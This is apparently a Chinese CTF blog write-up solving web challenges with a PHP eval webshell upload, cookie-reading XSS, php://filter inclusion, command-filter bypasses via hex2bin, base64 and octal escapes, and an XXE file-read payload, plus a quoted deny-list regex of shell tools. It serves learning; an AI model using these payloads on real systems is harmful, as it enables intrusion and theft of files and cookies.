前言:比赛并没有参加，趁着复习期末写题目放松一会，学习学习知识。

更多文章请移步0raNe的笔记

Web

upload1

典型的一句话木马，按照流程来就行

直接上传一个图片，不能直接连接成功，试着传入htaccess限定只能上传图片那些，那估计就是改图片为php就行

然后蚁剑连一下就可以了

疑惑：我尝试用jpg上传的时候改末尾并不能成功，看官p用的gif，

<code>GIF89a

<script language='php'>eval($_POST['attack']);</script>code>

按道理也应该正常执行的，并不是很理解。

审计

<code><script>alert(1)</script>

然后跟着wp写的

<script>alert(document.cookie)</script>

爆出flag，用url解码就可以得到flag了

想法：按照这个方法的话其实好像可以直接用hackerbar看cookie那一栏，并不需要构造xss，重新开一次容器发现方法并不可行，哈哈我自己想多了

Dragon

按照正常思路来走一遍，和上面的差不多但是都没有回显，最后得出也是xss

<code><script>alert(1)</script>

也是用这个得到的但是不能正常弹窗，和官p学习了一下可以用img

<img src=0 onerror =alert(1)>

这样就可以正常的弹窗了，然后和上面的题目一样

<img src=0 onerror =alert(document.cookie)>

获取cookie值，url解码得到flag

感想:任何比赛都能让人找到自己的不足漏洞，之后一定要狠狠学学。

tnl

类型和前几题差不多，也试看看，尝试输入到3的时候会有报错，以为是sql注入，尝试万能语句并没有作用

也尝试了一下xss也没有回显

用bp抓包看看，尝试利用伪协议得到index.php

这是尝试过后发现源码应该后面本身就包含了.php，得到了源码，base64解密一下

<code></form>

<?php

error_reporting(0);

@$file = $_POST['twothree'];

if(isset($file))

{

if( strpos( $file, "1" ) !== false || strpos( $file, "2" ) !== false || strpos( $file, "index")){

include ($file . '.php');

}

else{

echo "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'twothree'' at line 1";

}

}

?>

看了源码可以得知这并不是sql注入，而是一个伪协议绕过的题目，输入1，2，index可以获得相应的内容

那么进行简单的构造，我也是第一次看到这种

twothree=php://filter/convert.base64-encode/index/resource=flag

最后base64解密就可以得到flag了

你知道sys还能这样玩吗

根据提示进入sys.php

<code><?php

show_source(__FILE__);

if(isset($_POST['cmd'])){

echo "<pre>";

$cmd = $_POST['cmd'];

if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {

$output = system($cmd);

echo $output;

}

echo "</pre>";

}

?>

和国赛的那个有点类似

方法1：

尝试php -r来进行二次执行

cmd=php -r 'system(hex2bin("6c73202e2e2f"));'

查看

cmd=php -r 'system(hex2bin(ff3b636174202f666c61672e747874));'

ff是进行的一个绕过执行，否则得不到

方法2：

cmd=`printf "Y2F0IC8q"|bas""e64 -d`

这里看到一个师傅利用了printf和双引号绕过base64加密的方法得到了答案，也放在这，还是比较巧妙的

方法3：

上面几个都是借鉴的，还有一个办法就是八进制转化，之前写xyctf有一个和这样类似的，我就直接上payload了

cmd=$%27\143\141\164%27%3c$%27\57\146\154\141\147\56\164\170\164%27

详情可参考，文章，ezrce那个部分

ExX?

先搜看看flag{}有个假的flag，那再看看题目吧

尝试dirsearch扫描得到dom.php,出现了xml的报错很明显就是xxe的漏洞了，同天的lit比赛也是有一个题目是xxe

不知道原理直接上payload之后打算写一篇专题好好学习

<?xml version="1.0" encoding="utf-8"?>code>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flagggg.php" >]>

<user>

<name>&xxe;</name>

</user>

最后base64解密就行

总结